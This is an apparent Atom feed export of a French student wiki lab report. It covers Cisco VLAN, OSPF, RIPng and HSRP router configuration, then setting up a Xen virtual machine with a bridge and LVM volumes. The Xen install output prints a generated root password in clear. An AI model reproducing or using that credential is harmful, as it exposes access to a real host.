&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51419</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51419"/>
				<updated>2019-11-29T12:53:58Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Creation du Raid5 avec mdadm */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
